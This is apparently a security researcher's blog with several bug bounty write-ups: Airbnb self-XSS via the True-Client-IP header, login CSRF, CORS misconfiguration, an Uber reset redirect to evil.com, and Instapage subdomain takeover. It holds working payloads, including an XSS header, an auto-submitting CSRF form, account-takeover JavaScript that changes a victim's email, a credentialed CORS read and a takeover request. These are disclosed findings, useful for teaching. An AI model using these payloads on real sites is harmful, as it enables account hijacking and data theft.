AirBnb Bug Bounty: Turning Self-XSS into Good-XSS #2

Hello guys ūüôā

so this post is about one of my most interesting find while participating in bug bounty programs, yes interesting as its combination of many issues at AirBnb.

for those who don’t know AirBnb is running public program at HackerOne¬†and i will suggest to participate¬†in their program.¬†

here is list of issues which i got while doing research and used to escalate it further.

  1. Injecting XSS payload via True-Client-IP header.
  2. Exploiting login/logout CSRF.
  3. Escalating Self Stored XSS to Change victim’s account email.¬†

let’s go into details ,

Injecting XSS payload via True-Client-IP header:

Airbnb use to track users ip to show them under users security setting to make sure users are aware of via which ip or location his/her account got logged in previously in case of password reuse by others.

it’s good practice to give their users more secure feeling but not if its not implemented very well.

so this how users can see their login history under security setting .

login_track

if you hover your pointer to ?  icon the IP address of source machine will get reflected, so my initial thought is to spoof the source IP  as i heard about it before here.

I come to know i can spoof the IP with any IP using True-Client-IP header with login request, as result we can show any desired IP in login history.

Its good but still not convincing to report as its something we can do with our own account or for others we need password which is obviously not acceptable case.

credit goes to Parth for throwing idea of trying other strings instead of IP with True-Client-IP, so i did and any string get reflected under security setting directly and now we can just think of getting XSS , so i got.

Giving XSS payload instead of any ip with True-Client-IP header did the work.

POST /authenticate HTTP/1.1
Host: www.airbnb.co.in
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-CSRF-Token: V4$.airbnb.co.in$CpeQjCEtXnk$D7u8JuX39keALZgtvsmD3wr0_unmJBU3hVmj71h0Xlc=
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Referer: https://www.airbnb.co.in/
True-Client-IP: <h1>XSS</h1></center><script>alert(document.domain)</script>
Content-Length: 198
Cookie: [REDACTED]
Connection: close

utf8=√ʬú¬ď&authenticity_token=[REDACTED]&from=email_login&airlock_id=&email=[REDACTED]&password=[REDACTED]

And this is how i manage to get self stored xss under security setting .

Whenever i make request to security page , Self Stored XSS get executed.

xss_airbnb

 

Exploiting login/logout CSRF:

As i noticed there no csrf protection login as well as logout, i can easily make anyone to get logged out from his/her account and get logged into my account and get redirect to security page where XSS will get executed on victim browser.

CSRF Poc Code for the same :

<html>
 <body>
 <center> <br>
 <form action="https://www.airbnb.co.in/authenticate" method="POST">
 <input type="hidden" name="utf8" value="√ʬú¬ď" />
 <input type="hidden" name="authenticity_token" value="" />
 <input type="hidden" name="from" value="email_login" />
 <input type="hidden" name="airlock_id" value="" />
 <input type="hidden" name="email" value="attackers@email.com" />
 <input type="hidden" name="password" value="attacker@password" />
 <input type="hidden" name="form_remember_browser" value="yes" />
 <input type="hidden" name="redirect_params" value="https://www.airbnb.co.in/users/security/78323762" />
 <input type="submit" value="XSS ME" />
 </form>
 <script>
 document.forms[0].submit();
 </script>
 </center>
 </body>
</html>

this could be enough to report but still i want to check for if i can escalate further, my thought was to exploit this in victim’s account instead of making victim to logged into my account.

Escalation of ¬†Self Stored XSS to Change victim’s account email:

at AirBnb social logins is also an option for using it, so users can use their Google, Facebook account and i got the way to making this XSS exploitable for users who using Social Login to access AirBnb.

and this can be done in following way :

  • Instead of normal XSS Payload, Injected remote hosted JS.
  • Victim to login into attacker’s account via CSRF
  • Attacker’s Remote Hosted JS will get executed .
  • JS will perform 4 actions in IFrame which are as follows :
    • Victim will logged out from attacker’s account
    • Victim will get logged into his account via Google¬†Sign in
    • Attacker will navigate to page Profile Setting page
    • Attacker will Extract the CSRF Token from source code .
    • Attacker¬†will update the¬†victim¬†email.

looks complex ? but javascript will do it at once, i need to mention some minor things, which helps to making the scenario successful.

X-Frame Header is set to sameorigin , so i was able to make those 4 different request via iframe in context of airbnb host.

Social Login users don’t have password re-authentication while changing¬†the email, and once we changed it, we can reset the account via password reset process.

Making all in One : 

document.body.innerHTML='<html><body><center><h1>Testing :)</h1></center></body></html>';

var profileIframe = document.createElement('iframe');
 profileIframe.setAttribute('src', 'https://www.airbnb.co.in/logout');
 profileIframe.setAttribute('id', 'pi');
 document.body.appendChild(profileIframe);

document.getElementById('pi').onload = function() {
 var profileIframe1 = document.createElement('iframe');
 profileIframe1.setAttribute('src', 'https://www.airbnb.co.in/oauth_connect?from=google_login&service=google');
 profileIframe1.setAttribute('id', 'lo1');
 document.body.appendChild(profileIframe1);

document.getElementById('lo1').onload = function() {
 var profileIframe2 = document.createElement('iframe');
 profileIframe2.setAttribute('src', 'https://www.airbnb.co.in/users/edit');
 profileIframe2.setAttribute('id', 'po');
 document.body.appendChild(profileIframe2);

document.getElementById('po').onload = function() {

var lol = document.getElementById('po').contentWindow.document.body.innerHTML;
var ha = lol.split('"authenticity_token" type="hidden" value="');
var na = ha[1].split('"');

var ha2 = lol.split('https://www.airbnb.co.in/users/edit_verification/');
var na2 = ha2[1].split('"');

var ha22 = lol.split('"user[first_name]" size="30" type="text" value="');
var na22 = ha22[1].split('"');

var ha221 = lol.split('"user[last_name]" size="30" type="text" value="');
var na221 = ha221[1].split('"');

var ha222 = lol.split('"user[email]" size="30" type="text" value="');
var na222 = ha222[1].split('"');


 function submitRequest()
 {
 var xhr = new XMLHttpRequest();
 xhr.open("POST", "https://www.airbnb.co.in/update/"+na2[0]+"", true);
 xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
 xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
 xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 xhr.withCredentials = true;
 var body = "utf8=√É∆í√ā¬Ę√É‚Äö√Ö‚Äú√É‚Äö√Ę‚ā¨Ňď&authenticity_token="+na[0]+"&user[first_name]=Got&user[last_name]=Hacked&user[email]=gothacked@hacker.com&user_id="+na2[0]+"";
 var aBody = new Uint8Array(body.length);
 for (var i = 0; i < aBody.length; i++)
 aBody[i] = body.charCodeAt(i); 
 xhr.send(new Blob([aBody]));
 }
 submitRequest();

}}}

Later Airbnb removed the Login History feature from account setting which was root cause of the issue for fixing it.

Video POC :

Conclusion :

  • Sometimes multiple minor flaws can be chained to make impactful attacks, so it’s better to consider these minor issues at 1st place to avoid any big issues later.

escalation¬†must be reminding¬†you something you seen before same as title, here is that awesome write up find by fin1te, credit to him for his¬†writeup¬†to share¬†the idea of escalation & Parth ¬†for helping me with Javascript problems¬†ūüôā

do let me know your thoughts about it in comments ūüôā¬†

Exploiting Misconfigured CORS (Cross Origin Resource Sharing)

Hey frnds ūüôā

few days before noticed a blog post for exploiting facebook chat and reading all the chats of users so that made me to interested to know about the issues, and basically it was misconfigured CORS configuration where null origin is allowed with credentials true,  it was not something heard for the 1st time, @albinowax from the portswigger explained it very well in his blog post, so after reading that messenger blog post i went to test for the same issue for some targets where i allowed to test it.

but before that here are some tips about CORS where it can be exploitable from attackers point of view:

  • Poorly implemented, Best case for Attack:

Access-Control-Allow-Origin: https://attacker.com

Access-Control-Allow-Credentials: true

  • Poorly implemented, Exploitable:

Access-Control-Allow-Origin: null

Access-Control-Allow-Credentials: true

  • Bad implementation but not exploitable:

Access-Control-Allow-Origin: *

Access-Control-Allow-Credentials: true

or just

Access-Control-Allow-Origin: *

even this is not good from development point of view but due to own rules of CORS if Access-Control-Allow-Origin set to *¬†we don’t get benefit Access-Control-Allow-Credentials: true means no cookie access of the victim.

am not going to more deep about CORS, as earlier blog post covered it very well.
so in above i mentioned 3 cases where first two cases is exploitable in that eg of 2nd case is that Facebook Messenger chat issue which i mentioned in earlier section of the post, and eg of 1st case is mine which i found 2 days before only where any arbitrary Origin is allowed and same Origin get reflected back to Access-Control-Allow-Origin with Credentials set to True, the best way i found to check for CORS issue is using CURL.

eg : curl https://test.victim.com -H "Origin: https://geekboy.ninja" -I and check the response if Origin is reflected in the response or not.

OR if your burp pro user, Burp Active Scan may find this for you, but in mine case it didnt, idk the reason, when i CURLed my target manully¬†curl https://my.target.com -H "Origin: https://geekboy.ninja" -I , the Origin didnt got reflected but when i curled specifc endpoint where all users data getting back into response¬†curl https://my.target.com/api/web/user -H "Origin: https://geekboy.ninja" -I it reflected back with my host with Credentials set to True and that’s enough to make this work and steal all that data.

i made quick poc code for it

function cors() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("demo").innerHTML =
alert(this.responseText);
}
};
xhttp.open("GET", "https://my.target.com/api/web/user", true);
xhttp.withCredentials = true;
xhttp.send();
}

And here how it worked ūüôā

Sources for better understanding of CORS:

 

Views/Suggestions/Edits always welcome ūüôā

Starting Bug Bounty ? | Bug Bounty Resources

Hey all ūüôā

this post is not about any of my findings, its about resources for the bug bounties for learners, no matter you are starting or experienced, there is always something to learn from others. 

and if you are just starting into bug bounty then surly its going to be helpful post, and some kind of necessary to do as nowadays seen many new guys starting bug bounty by seeing that $$, its good that you want to make $$ from it but before that you should understand the process , quality and report writing which will help you to make more $$, so its better to understand 1st and then go for it.

so here am going to add some links which have lots of info’s,¬†resources,¬†writeups¬†about¬†i was talking before.

apart from this, here is some GitHub projects which maintaining this huge list of categorized writeups, links for blogs of frequent & successful bug hunters.

all the resources are originally shared by HackerOne, BugCrowd, Jack, Philippe, Alphr, Chan Ngai Long, Dheeraj Joshi

hope it will be useful.

 

Uber | Exploiting Stored URL Redirect in Password Reset Token

Hello Friends !

while trying my luck with Uber¬†i came a cross a wired behaviors in the¬†application which is not very common in today’s world.

i was messing around with password reset token generation of Uber, while requesting for password reset link i appended some known get parameter with password reset request which i was noticed before while checking for URL redirect issues in there oauth implementation.

it was NEXT parameter which is responsible for next URL or page after successful login.

so now come to password reset page, normally Uber password reset page URL looks like : https://login.uber.com/forgot-password , where crafted URL looks like : https://login.uber.com/forgot-password?source=auth&next_url=evil.com .

so once users will request password reset token via crafted link , user will get password reset token and once user set his new password, user will redirected to evil.com.

its a bug but as we know Uber don’t accept URL redirect issue until and¬†unless¬†there is something special, as URL redirect take place while password reset, i need to take advantage¬†of it.

i made a form which looks like same as Uber form which ask for Confirm Password after user sets his New Password which looks like :

pass

i used data: scheme to make sure it looks more legit instead of using any direct URL.

so now the scenario is :

  • Attacker will request password reset token via crafted Link.
  • Let’s assume user reset his password via reset link.
  • User will set & confirm the new password.
  • Attacker will get users new password.

as we can see its not win-win case , still we need to depend on the user if he choose to reset his account or not, but still it may happens and in that situation attacker will get password of users account, so Uber decided to fix it once i reported , and they were very quick to acknowledge the report, i will suggest to participate in Uber bug bounty program .

Here is the Video POC :

HackerOne Report Thread #163067

Hijacking tons of Instapage expired users Domains & Subdomains

Hello all ūüôā

so this post is about how I¬†was able to hijack ton’s of domains/subdomains who using Instapage if¬†there service got expired.

What is instapage ?

Instapage is a service that lets you build landing pages for your online marketing and promotion campaigns with ease. It offers features such as A/B Testing, multiple campaign management, easy page building, and a lot more!

it also allows users to map its template on there own domain or subdomains.

How i found it ?

as am one of researchers from HackerOne platform , I was trying to get something on HackerOne itself as I want that Hacking Hackers Badge of my profile.

I found hacker.one is inscope domain list which is one of the officail website of HackerOne, and when I vistied it and seen some error which caught in my eye and after figuring it, I come to know it was Instapage error which occurs when service get expired or domain or subdoamin not linked properly and it takes just few mintues to figurte it out that I can publish my own template to any of misconfigured and expired domains/subdomains of instapage and luckly HackerOne is one of there users.

Instapage error on Hacker.One :

bxwvtem

 

Vulnerable Post Request :

POST /ajax/builder2/publish/2340488 HTTP/1.1
Host: app.instapage.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://app.instapage.com/builder2?id=2340488
Content-Length: 31
Cookie: cookie_value
Connection: close

version=1&url=www.hacker.one

where url parameter value contain vulnerable domains .

Hacker.One domain Takeover : 

insta-0day

 

Here is the Video POC :

and with help of Google dork and error of instapage I found tons of websites are Vulnerable for this and anyone can takeover it with own content on it, I contacted Instapage via HackerOne.

HackerOne fixed it next of report by removing the cname entry pointing to instapage and later Instapage fixed in completely and got confirmation of fix via HackerOne report thread.

Thanks to HackerOne to being a mediator for contacting Instapage and fixing the things in correct way.

HackerOne report thread : #159156